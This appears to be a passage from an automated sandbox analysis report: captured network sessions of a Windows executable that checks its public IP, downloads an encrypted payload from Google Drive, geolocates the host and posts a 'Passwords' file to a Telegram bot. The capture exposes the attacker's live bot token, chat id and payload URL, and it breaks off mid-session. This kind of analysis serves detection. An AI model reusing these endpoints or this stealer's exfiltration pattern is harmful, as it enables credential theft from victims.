                                                                                                          13192.168.2.450033193.122.6.16880
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 07:32:33.685843945 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.449855142.250.186.1424433052C:\Users\user\Desktop\ZaRP7yvL1J.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 06:31:46 UTC216OUTGET /uc?export=download&id=1KcZPYu5jgn5AxI-SG2_U0KobG5DZYAUm HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                          Host: drive.google.com
                                                                                                          Cache-Control: no-cache
                                                                                                          2025-01-11 06:31:46 UTC1920INHTTP/1.1 303 See Other
                                                                                                          Content-Type: application/binary
                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                          Date: Sat, 11 Jan 2025 06:31:46 GMT
                                                                                                          Location: https://drive.usercontent.google.com/download?id=1KcZPYu5jgn5AxI-SG2_U0KobG5DZYAUm&export=download
                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                          Content-Security-Policy: script-src 'nonce-9g6Q6oNj95NmM-vrC8Yq1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                          Server: ESF
                                                                                                          Content-Length: 0
                                                                                                          X-XSS-Protection: 0
                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.449866142.250.185.1294433052C:\Users\user\Desktop\ZaRP7yvL1J.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 06:31:47 UTC258OUTGET /download?id=1KcZPYu5jgn5AxI-SG2_U0KobG5DZYAUm&export=download HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                          Cache-Control: no-cache
                                                                                                          Host: drive.usercontent.google.com
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-11 06:31:50 UTC4941INHTTP/1.1 200 OK
                                                                                                          X-GUploader-UploadID: AFIdbgTYf7RoOrWr6Kp6r4xzMYdQjed9eYuojrOekMHymbmTgrcgY-6c2NmSxiNUHrQ4xK9D
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Security-Policy: sandbox
                                                                                                          Content-Security-Policy: default-src 'none'
                                                                                                          Content-Security-Policy: frame-ancestors 'none'
                                                                                                          X-Content-Security-Policy: sandbox
                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Content-Disposition: attachment; filename="EBnQHCPDyfoRKDJBgS140.bin"
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Credentials: false
                                                                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                          Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 94272
                                                                                                          Last-Modified: Mon, 09 Dec 2024 07:09:34 GMT
                                                                                                          Date: Sat, 11 Jan 2025 06:31:49 GMT
                                                                                                          Expires: Sat, 11 Jan 2025 06:31:49 GMT
                                                                                                          Cache-Control: private, max-age=0
                                                                                                          X-Goog-Hash: crc32c=NCpH7Q==
                                                                                                          Server: UploadServer
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close
                                                                                                          2025-01-11 06:31:50 UTC4941INData Raw: 23 8e 9e 5f ab 3f d3 e9 1c bd bb ab e2 46 2a dd 10 50 6e 26 a9 09 c4 04 37 6d a0 38 d8 b9 8d e4 29 e5 f6 68 9b 1d 1b 12 8b b9 45 cf 87 d1 83 c2 29 c5 ae 36 dd c4 a0 f0 8f 25 22 9e a0 99 93 5e 65 9e c1 7b a9 34 13 2d 50 93 1d a4 92 6c 42 e1 22 3d bc 96 43 63 89 7a 95 de b3 24 a2 22 d9 53 44 82 15 74 5d 14 16 dd 71 27 24 7a fc d4 ee 80 f0 03 8f 79 9a 20 91 5f 4e 4f e9 c3 c5 fe 4e d9 9b d2 fb d2 06 be e7 e8 13 a6 3d 19 06 e5 5d 77 8d 0e dc 9d 10 24 b2 ab bb fa ed f9 e9 44 33 07 a7 cc 08 95 4e b6 d4 e1 14 e3 90 14 15 05 91 05 b5 dd 64 cc 9e b9 48 2f 77 11 55 c3 d7 df 6a 8f 29 22 2e cb 45 46 b4 b0 b1 8a 3a 90 66 f7 7d 85 b7 b4 ba c7 0c 33 f8 bc 9c 20 66 a9 82 19 4f ac 6b 1b cb c2 df 40 fb cd f3 a8 30 99 1e 1e dc 63 38 22 65 50 0f cb a3 cd 50 d2 72 d7 e1 c6 7a
                                                                                                          Data Ascii: #_?F*Pn&7m8)hE)6%"^e{4-PlB"=Ccz$"SDt]q'$zy _NON=]w$D3NdH/wUj)".EF:f}3 fOk@0c8"ePPrz
                                                                                                          2025-01-11 06:31:50 UTC4819INData Raw: ab 9f 9d 46 48 d0 10 d4 69 25 82 f6 f6 12 3e fc 91 f3 9a fe e6 d3 8a fc 90 9f 89 88 e8 1e f1 c0 de 1e ca 6b e1 71 93 0e 28 a2 3f 12 91 8f 6c b5 15 22 8b 4d 83 38 29 0a 98 6d 16 8e cd 9b 56 05 78 fa 81 2f 17 bb 70 64 c2 23 bf c9 f3 48 79 fe 7c b7 65 45 8d ee 51 ce d9 9b bd 79 d8 a4 38 d6 75 de cb 1a 1c 1e 1f 3b 30 74 be 20 78 f4 32 d3 fa d2 c2 dd 43 dc 80 5b ca cb 1a 16 50 e1 98 ee a9 8d 2c da be 3f 0b a7 94 db 85 2b 7a e9 fc 5f 6b 37 5e 95 3a a1 82 1b 1c ad b4 21 b8 96 f2 26 99 66 57 8e a3 03 d0 e7 4a 3f 06 8b 83 92 e2 04 bf a7 b6 ef 77 09 bf ae 20 4c 29 20 69 60 39 35 cb 7e 1b 4c fa 49 9a 20 e6 93 dd be cd bb a8 42 b2 d0 34 e0 65 2f 8b 3e 0d e8 ff 3c 3c 5f 07 50 f7 88 40 eb fb 94 67 18 a4 38 02 a2 71 34 fb 20 68 4f 62 16 2b 42 3f 08 7b e0 ed ab 19 6d 6f
                                                                                                          Data Ascii: FHi%>kq(?l"M8)mVx/pd#Hy|eEQy8u;0t x2C[P,?+z_k7^:!&fWJ?w L) i`95~LI B4e/><<_P@g8q4 hOb+B?{mo
                                                                                                          2025-01-11 06:31:50 UTC1320INData Raw: 7f 87 66 c2 df fb d7 8c 21 71 62 b2 cf a9 00 96 de 11 27 9d ac 1d cd b3 6d 31 f7 0c 60 af 71 6a 0e 07 c5 68 3a b8 dd b0 ae 84 c2 e8 8b 57 7b f2 20 4a 95 d6 89 84 29 83 9d 35 de 10 2f 1f 94 f3 32 1a d2 23 ab f3 de 1e 45 17 73 85 a3 75 82 d2 2c 6c 59 f7 90 02 7f d1 66 74 57 23 8d 21 a6 aa da e1 8b 20 56 36 92 e5 02 78 6b 79 b8 86 9f eb 49 24 87 45 18 fd f7 11 5d 47 ee bd 7f 4a f6 d2 57 ea be a3 3f d8 2f ee 14 0d 33 43 d9 86 34 e3 72 1f 14 b1 3e 01 82 45 45 2e 75 57 fd 6b aa 33 e6 ff 75 d0 8a 3b 0f 59 c5 2b b5 1c 7d 9b 9d f0 89 26 da 43 03 17 88 7c a6 e8 36 06 02 d4 ae 17 56 aa 1f 55 50 2a 0c 03 41 3a c4 43 7f 21 78 5c a1 0c 04 ad 1d 60 7f c5 29 9f e1 c6 9b d5 28 f6 ab e7 1a 54 5d e6 1e 7c 6b 4b 04 0e 67 e2 8f c0 3b f6 ca ec 3f 5a 86 7f 30 6e 35 98 75 61 33
                                                                                                          Data Ascii: f!qb'm1`qjh:W{ J)5/2#Esu,lYftW#! V6xkyI$E]GJW?/3C4r>EE.uWk3u;Y+}&C|6VUP*A:C!x\`)(T]|kKg;?Z0n5ua3
                                                                                                          2025-01-11 06:31:50 UTC1390INData Raw: 01 6d f5 bb 26 80 f0 05 2d 5c 82 52 bd 4a 4e 3f 4b e6 5c f7 21 1d 95 cd 47 7e 23 10 9c 63 27 1e 4c f7 ee df 00 70 22 7d fc eb c0 6e c9 ab ba 82 cd ea 2a 02 fd 68 d3 e6 79 f4 10 cb a1 8f 30 9b fa 1c 1f 4a c2 2f 58 bd 00 a9 b4 b4 57 27 7b cc 55 c3 dd cc 6f 9e 7c 4a bf 15 06 55 b5 4e 10 bc 4f 21 7d 98 7c 85 b7 be ba 1b ec 18 f8 bd 97 0b 37 b9 82 7f 4c ac 76 13 b1 55 df 4f fb cd 2d 2d 2a a9 14 3e 96 60 38 82 48 50 0f da e3 be 89 f2 72 dd ea de f7 45 9c 71 ff 29 74 86 76 f3 6c 42 e8 bd 88 21 4f bd 1e d7 a0 ab 64 cf a3 ad d0 b2 cc de 9b c6 0e 93 71 99 b6 46 3e b3 4a 09 0d 3b 84 52 1a 77 55 14 75 3b f3 99 ca 33 44 7d 2c 3f a3 c0 ff 25 74 5f eb 00 f5 37 74 f2 9c fc ca d8 36 10 4f 90 33 29 a6 7a b7 47 e2 c1 f7 92 02 ef 81 bf 2a f2 00 8a 26 20 c5 88 4e 80 e0 15 2e
                                                                                                          Data Ascii: m&-\RJN?K\!G~#c'Lp"}n*hy0J/XW'{Uo|JUNO!}|7LvUO--*>`8HPrEq)tvlB!OdqF>J;RwUu;3D},?%t_7t6O3)zG*& N.
                                                                                                          2025-01-11 06:31:50 UTC1390INData Raw: 25 92 2a 10 f8 83 a4 04 b6 0f 41 f0 f6 da fa f6 04 74 68 95 36 71 48 02 a3 f1 33 6d 4d 64 79 3e 30 6f 16 09 0c 89 40 69 7b 4d 20 ca ab e3 19 0e 58 1a 83 81 10 c4 73 cb d0 d6 09 ee 42 2b 0b 26 15 13 f3 13 78 43 03 2e b4 70 1e fe 39 d4 48 0d 35 5b 92 a0 63 78 4b 83 cc 1d 52 5d 27 b3 f3 72 67 e8 35 c4 28 73 cf 9d 43 f2 f5 c1 5d 07 18 b1 b5 55 74 b3 dd 7e 68 ff 14 81 4a 07 cc 99 fe c2 ac 4e 6b bd b6 c2 3c d4 25 62 0e 40 ed 99 0b 9b 3b f4 02 9b ea 2d 11 5f 63 53 e9 68 80 1a a5 12 bc f5 77 d7 8b db 84 e7 13 6f 1e f4 d3 b7 fe 98 e9 f9 97 63 b6 61 a6 58 da 45 08 69 09 8c 21 92 a4 78 0d 19 40 cc 82 88 29 4c 62 ae af ea 4d 85 22 df e3 58 b3 da 15 bd 5e a3 8e 94 28 fa 63 3f 05 55 18 0c 27 c5 5c b2 ce 35 90 43 41 68 cd 0d bb 3c 12 2e ac 50 8d f8 3a 0e 3b 21 7b 87 36
                                                                                                          Data Ascii: %*Ath6qH3mMdy>0o@i{M XsB+&xC.p9H5[cxKR]'rg5(sC]Ut~hJNk<%b@;-_cShwocaXEi!x@)LbM"X^(c?U'\5CAh<.P:;!{6
                                                                                                          2025-01-11 06:31:50 UTC1390INData Raw: 2e c7 7d 69 70 aa 82 e8 0a f2 78 e2 dd e7 11 3c 93 2b 64 f8 72 0c cb 0a 96 48 00 c6 50 0b 7a b2 88 60 df db 18 13 3d 8d 55 fe 76 fc df 78 bb b3 c3 bb e8 6a 77 7a 13 e1 5b 5b 9a 76 58 bd 00 f1 16 fb b9 52 15 80 ad 0a cf 03 b9 2c 7c 29 64 0f d8 fa af 25 46 7d bd 90 c3 24 a4 88 65 85 2f d3 05 1d 25 55 46 a6 19 e0 e9 da 61 68 2e 79 98 d4 b8 20 10 30 19 84 e5 88 a1 28 81 bf 06 9c 41 30 13 42 cf 7a 8d d1 8b 36 b7 0a e4 98 b8 64 cf c2 49 eb 57 7d 05 3d b7 75 05 3c a3 f6 8d db c0 ab 83 d7 b9 7c 9a 3e 98 d7 3e 54 ac 3b 5a e3 83 6d 57 33 34 8d a1 04 24 00 4e b5 90 c1 32 09 75 21 74 76 2e 9d 8e 2c 04 e8 93 cb b1 08 05 74 e4 5c 85 ec 71 96 ca e3 f1 71 98 18 02 68 81 d8 f2 bc e4 78 ab 95 91 5c 47 ce 03 4b 07 5c 00 78 9f 03 e4 dd 98 85 9a f4 ec d3 e5 e9 84 89 a5 47 63
                                                                                                          Data Ascii: .}ipx<+drHPz`=Uvxjwz[[vXR,|)d%F}$e/%UFah.y 0(A0Bz6dIW}=u<|>>T;ZmW34$N2u!tv.,t\qqhx\GK\xGc
                                                                                                          2025-01-11 06:31:50 UTC1390INData Raw: c2 df bb ff 5d 20 6a 58 cb 85 d5 01 92 db 34 25 e6 f7 1d d2 ab 47 92 bc 0c 6a d9 79 a5 0e 77 e7 26 38 bd 59 d3 d3 cf ea 10 8f 55 73 82 6a 73 d3 d3 a1 55 2f f0 40 48 92 16 23 13 e6 a9 04 1a a2 4c 6a c3 dc 18 f9 1f 1c 56 87 75 84 d4 f6 7d 24 a7 83 05 43 b8 34 74 57 21 b4 72 d4 c2 cc eb fd 5c 87 27 96 cf 02 72 01 38 ca f8 87 c3 ea 4b 52 4f 18 fb e4 17 2e 1c e9 cf e7 28 a5 a2 38 35 96 f7 39 cb 20 f4 16 36 a5 52 dc ac 2a e9 18 5d 38 f2 3c 01 52 44 45 2e 1a 53 fc 69 db 14 e3 fe 71 a4 f1 af 0f 53 eb 6c bc 0d 7e 83 6b e2 9c 3d cd 65 18 eb f2 27 ad f9 39 02 c7 fc 04 1d 56 a0 0e 52 44 39 0c 03 4f 55 9e 6b ea 2b 50 0e b2 09 0e a0 14 58 58 d4 06 19 ec c4 ea 91 39 f1 dd 53 d5 54 2d 83 cb 7c 6b 67 6b 51 7c d2 8f e8 ad f7 ca ea 09 5f 86 7f 34 1e a9 a0 75 11 21 ae 5b 87
                                                                                                          Data Ascii: ] jX4%Gjyw&8YUsjsU/@H#LjVu}$C4tW!r\'r8KRO.(859 6R*]8<RDE.SiqSl~k=e'9VRD9OUk+PXX9ST-|kgkQ|_4u![
                                                                                                          2025-01-11 06:31:50 UTC1390INData Raw: ba b5 a5 40 0d c0 11 55 c5 c4 d7 7b 87 55 24 28 e3 0a 46 b7 ba 69 b4 4e 21 6c 98 78 84 b7 be 92 53 ec 33 fc ae 9e 30 3f bd 7c 7e 5d a6 7a 19 dd 3c de 53 f0 dc 26 01 27 b1 b4 3e dc 69 29 87 0b 0f 0f cb e9 dc 59 da e7 d7 e1 c2 69 7f 9c 71 fe 27 42 f4 94 4c 6c 32 40 90 8e 54 db 34 02 a7 72 e1 a9 bd a1 bd bf 9d 6e fb 88 9c ac 85 71 ef 07 4f 2a b1 4a 61 62 af 84 22 0d 7a c2 6a ab 31 e5 6d bb 18 57 0f be 55 7c b0 e9 07 57 7a fc 74 3d c9 77 a7 fd 1d cd d4 6a 32 8d 1d 0c 23 04 5e 8a 2f 4e 27 e3 98 00 a9 b3 a8 53 3f fa 92 54 06 72 ad 27 5c 1b 0c 3f e7 e2 d5 db 5b f1 68 51 85 e4 c6 96 c2 08 c9 ec 08 78 ec cd 2c db d8 bb 2b e7 53 79 76 a2 88 9a a2 7c 83 ae 1b e0 5b dc 1d 5e 15 8a 70 04 d9 e4 a8 2c ef 77 75 ef 8d c4 3d 25 6f 37 b9 bd 3a 6e 91 23 93 2c 15 82 41 5d 16
                                                                                                          Data Ascii: @U{U$(FiN!lxS30?|~]z<S&'>i)Yiq'BLl2@T4rnqO*Jab"zj1mWU|Wzt=wj2#^/N'S?Tr'\?[hQx,+Syv|[^p,wu=%o7:n#,A]
                                                                                                          2025-01-11 06:31:50 UTC1390INData Raw: 69 1a 11 28 aa bc 7f d7 54 25 c3 66 41 d9 94 16 00 92 2e 7d ec e0 7f 65 f0 0f 9a 20 8c 12 98 43 83 c3 c1 3e f3 1d a5 d3 e6 42 cb 26 dc 4d ed 40 bc 4b 11 2d 1b 0b db bd 4a 37 99 bf a7 6b d6 36 0b bd 7c da 8e 18 2a 06 e8 5b 55 c8 3a 72 e5 4b e2 fa 7f 50 1a b2 7a a0 ee 4f e5 98 d6 ac b8 07 7e 0f e5 c3 97 cf 8b f8 ed 97 7f 30 a8 ca 70 c5 53 0d 7e 2c fd c0 50 a5 79 1b 39 51 c2 ab ad 3a 50 79 a1 b2 f7 74 ca 1b 26 e8 86 b3 cb 29 ef 5c b2 9a 85 33 6b 4b e8 05 55 12 48 39 d4 42 ca d0 1d 55 53 41 62 e5 07 bb 3c 19 26 8a 26 6f 81 3b 7e 28 32 6a 91 55 63 d0 26 a0 bc f3 c1 d0 c0 7f 6d 42 48 a1 b6 f2 c2 cc e6 7f f3 b6 6a f0 45 68 99 4b ec b5 08 c9 70 ce 8d fa 6e e7 08 c4 e7 44 15 1c 97 29 1a c9 b5 0d 16 f3 04 f1 a8 ca ef 9b aa 5f 92 35 d0 30 08 19 9d 71 b5 0e d3 55 57
                                                                                                          Data Ascii: i(T%fA.}e C>B&M@K-J7k6|*[U:rKPzO~0pS~,Py9Q:Pyt&)\3kKUH9BUSAb<&&o;~(2jUc&mBHjEhKpnD)_50qUW
                                                                                                          2025-01-11 06:31:50 UTC1390INData Raw: 10 b7 5e b6 60 64 7f cc 57 56 25 6c 36 a6 b8 39 24 a4 82 4d 6d 2f d3 0f 59 22 44 40 a3 e4 e0 e9 c0 72 60 05 7e 89 dc d6 45 20 34 13 d0 de 88 a1 11 92 b6 06 95 2a b1 3b 9a ce 69 8d b2 18 7c 4a 7a cc dc ab 6f d4 c3 5a e1 6e 89 29 24 ac 74 6d fb e5 f7 87 cc a9 27 54 d7 b3 15 96 37 ea 87 0a 3e dc 54 82 ef 83 6b 71 2a 53 31 21 04 22 1d 87 ab 87 da 0c be 93 21 64 7e 5b 84 9f 2b 77 ac 82 da c9 12 c1 74 e4 5b e7 e5 60 91 b2 9d 31 79 66 1e cc b2 96 04 f6 6e 61 30 ac e7 0c 53 40 b6 77 8f 00 4a 0e e5 f3 09 3b dd 6d 85 9a f8 ff db e5 e6 bc dc 8b 88 60 1f f1 c0 b1 c4 c7 6b e2 32 91 06 47 a9 17 86 9b 8f b6 78 0f 16 aa 6a 7d 39 30 13 8d 67 28 22 cc 88 57 c9 64 d4 97 07 bd bb 70 10 cb 26 d0 92 81 1e 78 ef 05 89 d8 c4 8d e8 48 dd 27 9a ae 57 e9 a1 29 67 74 de c1 12 7e 95
                                                                                                          Data Ascii: ^`dWV%l69$Mm/Y"D@r`~E 4*;i|JzoZn)$tm'T7>Tkq*S1!"!d~[+wt[`1yfna0S@wJ;m`k2Gxj}90g("Wdp&xH'W)gt~


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.449913104.21.16.14433052C:\Users\user\Desktop\ZaRP7yvL1J.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 06:31:53 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-11 06:31:54 UTC855INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 06:31:54 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 362
                                                                                                          Connection: close
                                                                                                          Age: 1891903
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          cf-cache-status: HIT
                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bx6dv4JbqCpN9Yx6rIrlteZD2G1dQK127X5pBCXU7GikIN7tMlpwouvtKrpQz2LnTDouErMy2QrFxUaEne%2B2P464bujay1g2YvDPM0azJeRmHE6J8GNCXca%2BaVvQ5AH%2BWcg5VYaP"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 9002ddd2bb2b1899-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1656&min_rtt=1646&rtt_var=638&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1687861&cwnd=153&unsent_bytes=0&cid=7ae35295f409020a&ts=184&x=0"
                                                                                                          2025-01-11 06:31:54 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.449968149.154.167.2204433052C:\Users\user\Desktop\ZaRP7yvL1J.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 06:32:03 UTC295OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd31dfbf4d9096
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-11 06:32:03 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 64 66 62 66 34 64 39 30 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd31dfbf4d9096Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 06:32:03 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 06:32:03 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 535
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 06:32:03 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 37 31 32 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44886,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736577123,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.449983149.154.167.2204433052C:\Users\user\Desktop\ZaRP7yvL1J.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 06:32:04 UTC295OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd31f77526aea5
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
